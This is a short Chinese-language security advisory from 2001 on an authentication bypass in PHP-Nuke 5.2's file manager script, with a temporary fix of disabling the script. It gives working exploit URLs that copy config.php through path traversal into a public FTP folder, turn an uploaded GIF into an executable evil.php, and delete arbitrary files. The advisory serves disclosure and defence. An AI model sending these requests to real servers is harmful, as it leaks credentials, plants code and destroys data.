PHP Nuke 拷贝和删除文件漏洞发布时间:2001-11-08 更新时间:2001-11-08 严重程度:高 威胁程度:普通用户访问权限 错误类型:设计错误 利用方式:服务器模式 受影响系统 Francisco Burzi PHP-Nuke 5.2详细描述 PHP Nuke是WEB 站点建立和管理软件,是由PHP脚本语言编写,默认安装了脚本 'admin/case/case.filemanager.php',可以被用来拷贝和删除服务器上的文件。 脚本原来的实现是对用户进行验证,不过存在缺陷可以导致任意用户可以绕过认证 来拷贝和删除任意文件。 测试代码 以下方法可以把 php-nuke-document-root/config.php 拷贝到 /var/ftp/incoming/phpnuke-config.txt: http://example.org/admin/case/case.filemanager.php/admin.php?op=move& confirm=1&do=copy&basedir=&file=../../config.php& newfile=/var/ftp/pub/incoming/phpnuke-config.txt 以下方法可以把原先上载的(/var/ftp/pub/incoming/foobar.gif) 拷贝成一个PHP脚本 (evil.php) http://example.org/admin/case/case.filemanager.php/admin.php?op=move& confirm=1&do=copy&basedir=&file=/var/ftp/pub/incoming/foobar.gif& newfile=evil.php 下面的方法可以删除/tmp/too文件: http://example.org/admin/case/case.filemanager.php/admin.php?op=del& confirm=1&basedir=&file=/tmp/foo 解决方案 临时方法: # cd php-nuke-document-root # chmod 0 admin/case/case.filemanager.php 相关信息 masa@magnux.com PHP主页:http://www.ncc.org.ve/php-nuke.php3?op=english |
